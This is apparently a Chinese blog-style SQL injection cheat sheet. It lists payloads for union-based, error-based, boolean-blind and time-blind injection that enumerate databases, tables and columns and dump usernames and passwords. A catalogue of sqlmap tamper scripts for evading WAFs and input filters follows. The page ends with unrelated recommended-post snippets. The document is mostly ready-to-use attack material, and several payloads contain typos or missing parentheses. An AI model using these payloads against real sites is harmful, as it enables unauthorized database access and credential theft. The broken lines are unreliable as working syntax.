sql注入notebook
内容来自:
联合查询注入
使用场景
页面上有显示位
什么是显示位:在一个在一个网站的正常页面,服务端执行SQL语句查询数据库中的数据,客户端将数据展示在页面中,这个展示数据的位置就叫显示位 。
payload
?id=1' order by 数值 --+
?id=-1' union select 1,2,3 --+
?id=-1' union select 1,2,database() --+
?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+
?id=-1' union select 1,2,(select group_concat(schema_name) from information_schema.schema) --+
?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security' --+
?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+
?id=-1' union select 1,2,(select group_concat(name, 0x3a, passwd) from security.users)
报错型注入
使用场景,页面上没有显示位但是有sql语句执行错误信息输出。
- ExtractValue
extractValue('@1', concat('~', (***payload***)));
extractValue('@1', concat('~', (select database())));
- UpdateXml
updatexml('qwqw', concat('~', (***payload***)), 'qwqw');
updatexml('qwqw', concat('~', (select database())), 'qwqw');
- floor
?id=1 and 1=2 union select 1 from (select+count(*),concat(floor(rand(0)*2),(***payload***))a from information_schema.tables group by a)b
?id=-1' union select 1, count(*), concat((***payload***), floor(rand()*2))as a from information_schema.tables group by a --+
?id=-1' union select 1, count(*), concat((select database()), floor(rand()*2)) as a from information_schema.tables group by a --+
?id=-1' union select 1,count(*), concat((select table_name from information_schema.tables where table_schema='security' limit 1, 1), floor(rand()*2)) as a from information_schema.columns group by a --+
?id=-1' union select 1, count(*), concat((select column_name from information_schema.columns where table_schema='security' and table_name='users', limit 1,1), floor(rand()*2)) as a from information_schema.columns group by a --+
?id=-1' union select 1,count(*), concat((select concat_ws('|',username,password) from security.users limit 1,1), floor(rand()*2))as a from information_schema.tables group by a --+
#limit x,1
布尔盲注
使用场景:页面没有显示位,也没有SQL语句执行错误信息,只能通过页面返回是否正常来判断注入点。
#数据库 个数-长度-名
?id=1' union (select count(schema_name) from information_schema.schemata) < 77 --+
?id=1' union (select length(schema_name) from information_schema.schemata limit 1,1) < 77 --+
?id=1' union (select assii(substr(select schema_name from information_schema.schema limit 1,1)1,1)) < 77 --+
#表 个数-长度-名
?id=1' union (select count(table_name) from information_schema.tables where table_schema='security') < 77 --+
?id=1' union (select length(table_name) from information.schema.tables where table_schema='security') < 77 --+
?id=1' union (select ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))) < 77 --+
#字段 个数-长度-名
?id=1' union (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users') < 77 --+
?id=1' union (select length(column_name) from infomation_schema.columns where table_schema='security' and table_name='users' limit 1,1) < 77 --+
?id=1' union (select ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),1,1))) < 77 --+
# 内容 行数-长度-名
?id=1' union (select count(*) from security.users) < 77 --+
?id=1' union (select length(username) from security.users limit 1,1) < 77 --+
?id=1' union (select ascii(substr((select username from security.users limit 1,1),1,1))) < 77 --+
时间盲注
使用场景:页面上没有显示位,也没有输出SQL语句执行错误信息。正确的SQL语句和错误的SQL语句返回页面都一样,但是加入sleep(5)条件之后,如果if条件成立则页面的返回速度明显慢了5秒。
判断数据库的个数
id=1' and if((select count(schema_name) from information_schema.schemata)=9, sleep(5), 1) --+
判断数据库名的长度
id=1' and if((select length(schema_name) from information_schema.schemata)=9, sleep(5), 1) --+
查询数据库名
id=1' and if((select ascii(substr((select schema_name from information_schema.schemata limit 0,1)1,1)))
SQLMap Tamper
常用的tamper脚本
sql -u [url] --tamper [模块名]
1.apostrophemask.py
适用数据库:ALL
作用:将引号替换为utf-8,用于过滤单引号
使用脚本前:tamper(“1 AND ‘1’='1”)
使用脚本后:1 AND %EF%BC%871%EF%BC%87=%EF%BC%871
2.base64encode.py
适用数据库:ALL
作用:替换为base64编码
使用脚本前:tamper(“1’ AND SLEEP(5)#”)
使用脚本后:MScgQU5EIFNMRUVQKDUpIw==
3.multiplespaces.py
适用数据库:ALL
作用:围绕sql关键字添加多个空格
使用脚本前:tamper(‘1 UNION SELECT foobar’)
使用脚本后:1 UNION SELECT foobar
4.space2plus.py
适用数据库:ALL
作用:用加号替换空格
使用脚本前:tamper(‘SELECT id FROM users’)
使用脚本后:SELECT+id+FROM+users
5.nonrecursivereplacement.py
适用数据库:ALL
作用:作为双重查询语句,用双重语句替代预定义的sql关键字(适用于非常弱的自定义过滤器,例如将
select替换为空)
使用脚本前:tamper(‘1 UNION SELECT 2–’)
使用脚本后:1 UNIOUNIONN SELESELECTCT 2–
6.space2randomblank.py
适用数据库:ALL
作用:将空格替换为其他有效字符
使用脚本前:tamper(‘SELECT id FROM users’)
使用脚本后:SELECT%0Did%0DFROM%0Ausers
7.unionalltounion.py
适用数据库:ALL
作用:将union allselect 替换为unionselect
使用脚本前:tamper(’-1 UNION ALL SELECT’)
使用脚本后:-1 UNION SELECT
8.securesphere.py
适用数据库:ALL
作用:追加特定的字符串
使用脚本前:tamper(‘1 AND 1=1’)
使用脚本后:1 AND 1=1 and ‘0having’=‘0having’
9.space2dash.py
适用数据库:ALL
作用:将空格替换为–,并添加一个随机字符串和换行符
使用脚本前:tamper(‘1 AND 9227=9227’)
使用脚本后:1–nVNaVoPYeva%0AAND–ngNvzqu%0A9227=9227
10.space2mssqlblank.py
适用数据库:Microsoft SQL Server
测试通过数据库:Microsoft SQL Server 2000、Microsoft SQL Server 2005
作用:将空格随机替换为其他空格符号(’%01’, ‘%02’, ‘%03’, ‘%04’, ‘%05’, ‘%06’, ‘%07’,
‘%08’, ‘%09’, ‘%0B’, ‘%0C’, ‘%0D’, ‘%0E’, ‘%0F’, ‘%0A’)
使用脚本前:tamper(‘SELECT id FROM users’)
使用脚本后:SELECT%0Eid%0DFROM%07users
11.percentage.py
适用数据库:ASP
测试通过数据库:Microsoft SQL Server 2000, 2005、MySQL 5.1.56, 5.5.11、PostgreSQL
9.0
作用:在每个字符前添加一个%
使用脚本前:tamper(‘SELECT FIELD FROM TABLE’)
使用脚本后:%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
12.sp_password.py
适用数据库:MSSQL
作用:从T-SQL日志的自动迷糊处理的有效载荷中追加sp_password
使用脚本前:tamper('1 AND 9227=9227-- ')
使用脚本后:1 AND 9227=9227-- sp_password
13.charencode.py
测试通过数据库:Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、
PostgreSQL 8.3, 8.4, 9.0
作用:对给定的payload全部字符使用url编码(不处理已经编码的字符)
使用脚本前:tamper(‘SELECT FIELD FROM%20TABLE’)
使用脚本后:%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45
14.randomcase.py
测试通过数据库:Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、
PostgreSQL 8.3, 8.4, 9.0
作用:随机大小写
使用脚本前:tamper(‘INSERT’)
使用脚本后:INseRt
15.charunicodeencode.py
适用数据库:ASP、ASP.NET
测试通过数据库:Microsoft SQL Server 2000/2005、MySQL 5.1.56、PostgreSQL 9.0.3
作用:适用字符串的unicode编码
使用脚本前:tamper(‘SELECT FIELD%20FROM TABLE’)
使用脚本后:
%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u
0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045
16.space2comment.py
测试通过数据库:Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
作用:将空格替换为/**/
使用脚本前:tamper(‘SELECT id FROM users’)
使用脚本后:SELECT/**/id/**/FROM/**/users
17.equaltolike.py
测试通过数据库:Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5
作用:将=替换为LIKE
使用脚本前:tamper(‘SELECT * FROM users WHERE id=1’)
使用脚本后:SELECT * FROM users WHERE id LIKE 1
18.equaltolike.py
测试通过数据库:MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
作用:将>替换为GREATEST,绕过对>的过滤
使用脚本前:tamper(‘1 AND A > B’)
使用脚本后:1 AND GREATEST(A,B+1)=A
19.ifnull2ifisnull.py
适用数据库:MySQL、SQLite (possibly)、SAP MaxDB (possibly)
测试通过数据库:MySQL 5.0 and 5.5
作用:将类似于IFNULL(A, B)替换为IF(ISNULL(A), B, A),绕过对IFNULL的过滤
使用脚本前:tamper(‘IFNULL(1, 2)’)
使用脚本后:IF(ISNULL(1),2,1)
20.modsecurityversioned.py
适用数据库:MySQL
测试通过数据库:MySQL 5.0
作用:过滤空格,使用mysql内联注释的方式进行注入
使用脚本前:tamper(‘1 AND 2>1–’)
使用脚本后:1 /!30874AND 2>1/–
21.space2mysqlblank.py
适用数据库:MySQL
测试通过数据库:MySQL 5.1
作用:将空格替换为其他空格符号(’%09’, ‘%0A’, ‘%0C’, ‘%0D’, ‘%0B’)
使用脚本前:tamper(‘SELECT id FROM users’)
使用脚本后:SELECT%0Bid%0DFROM%0Cusers
22.modsecurityzeroversioned.py
适用数据库:MySQL
测试通过数据库:MySQL 5.0
作用:使用内联注释方式(/!00000/)进行注入
使用脚本前:tamper(‘1 AND 2>1–’)
使用脚本后:1 /!00000AND 2>1/–
23.space2mysqldash.py
适用数据库:MySQL、MSSQL
作用:将空格替换为 – ,并追随一个换行符
使用脚本前:tamper(‘1 AND 9227=9227’)
使用脚本后:1–%0AAND–%0A9227=9227
24.bluecoat.py
适用数据库:Blue Coat SGOS
测试通过数据库:MySQL 5.1,、SGOS
作用:在sql语句之后用有效的随机空白字符替换空格符,随后用LIKE替换=
使用脚本前:tamper(‘SELECT id FROM users where id = 1’)
使用脚本后:SELECT%09id FROM users where id LIKE 1
25.versionedkeywords.py
适用数据库:MySQL
测试通过数据库:MySQL 4.0.18, 5.1.56, 5.5.11
作用:注释绕过
使用脚本前:tamper(‘1 UNION ALL SELECT NULL, NULL,
CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS
CHAR),CHAR(32)),CHAR(58,100,114,117,58))#’)
使用脚本后:1/!UNION//!ALL//!SELECT//!NULL/,/!NULL/,
CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/!AS//!CHAR/),CHAR(
32)),CHAR(58,100,114,117,58))#
26.halfversionedmorekeywords.py
适用数据库:MySQL < 5.1
测试通过数据库:MySQL 4.0.18/5.0.22
作用:在每个关键字前添加mysql版本注释
使用脚本前:tamper(“value’ UNION ALL SELECT
CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS
CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’='QDWa”)
使用脚本后:
value’/!0UNION/!0ALL/!0SELECT/!0CONCAT(/!0CHAR(58,107,112,113,58),/!0IFNUL
L(CAST(/!0CURRENT_USER()/!0AS/!0CHAR),/!0CHAR(32)),/!0CHAR(58,97,110,121,58
)),/!0NULL,/!0NULL#/!0AND ‘QDWa’='QDWa
27.space2morehash.py
适用数据库:MySQL >= 5.1.13
测试通过数据库:MySQL 5.1.41
作用:将空格替换为#,并添加一个随机字符串和换行符
使用脚本前:tamper(‘1 AND 9227=9227’)
使用脚本后:1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227
28.apostrophenullencode.py
适用数据库:ALL
作用:用非法双字节Unicode字符替换单引号
使用脚本前:tamper(“1 AND ‘1’='1”)
使用脚本后:1 AND %00%271%00%27=%00%271
29.appendnullbyte.py
适用数据库:ALL
作用:在有效载荷的结束位置加载null字节字符编码
使用脚本前:tamper(‘1 AND 1=1’)
使用脚本后:1 AND 1=1%00
30.chardoubleencode.py
适用数据库:ALL
作用:对给定的payload全部字符使用双重url编码(不处理已经编码的字符)
使用脚本前:tamper(‘SELECT FIELD FROM%20TABLE’)
使用脚本后:%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F
%254D%2520%2554%2541%2542%254C%2545
31.unmagicquotes.py
适用数据库:ALL
作用:用一个多字节组合%bf%27和末尾通用注释一起替换空格
使用脚本前:tamper(“1’ AND 1=1”)
使用脚本后:1%bf%27 AND 1=1–
32.randomcomments.py
适用数据库:ALL
作用:用注释符分割sql关键字
使用脚本前:tamper(‘INSERT’)
使用脚本后:I//N//SERT
sql注入notebook的更多相关文章
- 个人网站对xss跨站脚本攻击(重点是富文本编辑器情况)和sql注入攻击的防范
昨天本博客受到了xss跨站脚本注入攻击,3分钟攻陷--其实攻击者进攻的手法很简单,没啥技术含量.只能感叹自己之前竟然完全没防范. 这是数据库里留下的一些记录.最后那人弄了一个无限循环弹出框的脚本,估计 ...
- Web安全相关(五):SQL注入(SQL Injection)
简介 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据 ...
- 从c#角度看万能密码SQL注入漏洞
以前学习渗透时,虽然也玩过万能密码SQL注入漏洞登陆网站后台,但仅仅会用,并不理解其原理. 今天学习c#数据库这一块,正好学到了这方面的知识,才明白原来是怎么回事. 众所周知的万能密码SQL注入漏洞, ...
- 浅谈SQL注入风险 - 一个Login拿下Server
前两天,带着学生们学习了简单的ASP.NET MVC,通过ADO.NET方式连接数据库,实现增删改查. 可能有一部分学生提前预习过,在我写登录SQL的时候,他们鄙视我说:“老师你这SQL有注入,随便都 ...
- 揭开SQL注入的神秘面纱PPT分享
SQL注入是一个老生常谈但又经常会出现的问题.该课程是我在公司内部培训的课程,现在分享出来,希望对大家有帮助. 点击这里下载.
- 深入理解SQL注入绕过WAF和过滤机制
知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 ...
- jdbc java数据库连接 8)防止sql注入
回顾下之前jdbc的开发步骤: 1:建项目,引入数据库驱动包 2:加载驱动 Class.forName(..); 3:获取连接对象 4:创建执行sql语句的stmt对象; 写sql 5:执行sql ...
- Entity Framework关于SQL注入安全问题
1.EF生成的sql语句,用 parameter 进行传值,所以不会有sql注入问题 2.EF下有涉及外部输入参数传值的,禁止使用EF直接执行sql命令方式,使用实体 SQL 参考: https: ...
- 关于SQL注入和如何防止
之前在笔试的时候没有很好的答出这个问题,因此我要总结一下问题,以免日后继续在这个地方跌倒,以下是自己的理解,如有错误请指出 一.什么是SQL注入 SQL注入就是服务器在根据业务去处理数据库的时候,客户 ...
随机推荐
- [noip模拟]难缠的值周生<宽搜>
难缠的值周生 [问题描述] 小 P 上学总是迟到,迟到了以后常常会被值周生发现.被值周生发现就会给他所在的班级扣分,被扣了分不免要挨班主任的训,这令小 P 很不爽.不过,聪明的他经过观察发现,值周生通 ...
- 俩个对象的hashCode()相同,则equals()也一定为true,对吗?
不对,俩个对象的hashCode()相同,equals()不一定为true. 代码示例: 1 String str1 = "通话"; 2 String str2 = "重 ...
- python学习要点(二)
我的博客:https://www.luozhiyun.com/archives/269 '==' VS 'is' '=='操作符比较对象之间的值是否相等. 'is'操作符比较的是对象的身份标识是否相等 ...
- PTA | 1009说反话(20分)
给定一句英语,要求你编写程序,将句中所有单词的顺序颠倒输出. 输入格式: 测试输入包含一个测试用例,在一行内给出总长度不超过80的字符串.字符串由若干单词和若干空格组成,其中单词是由英文字母(大小写有 ...
- Linux基础:Day05
iptables ip 的 tables ip的表格: iptables只是netfilter的前端管理工具:netfilter是linux内核提供的数据流量管理模块: iptables/netfil ...
- 微信小程序修改单选按钮的默认样式
https://blog.csdn.net/abs1004/article/details/78922596
- mpvue微信小程序怎么写轮播图,和官方微信代码的差别
目前用mpvue很多第三方的ui库是引入不了的,因为它不支持含有dom操作. 那我们要做轮播图的话一个是手写另外一个就是用小程序的swiper组件了: 官方代码: <swiper indicat ...
- vector数组的相关知识
Vector 类实现了一个动态数组.和 ArrayList 很相似,但是两者是不同的: Vector 是同步访问的. Vector 包含了许多传统的方法,这些方法不属于集合框架. Vector 主要用 ...
- javascript 入门 之select2功能大全
1.代码较为简单,不作太多讲解,新建一个javascript工程,在index.htl中编写如下代码,根据<link>和<script>标签配制好js和css库便可! < ...
- django中写分页
1.引用函数import from django.core.paginator import Paginator 2.分页 page_obj = Paginator(Article.objects.a ...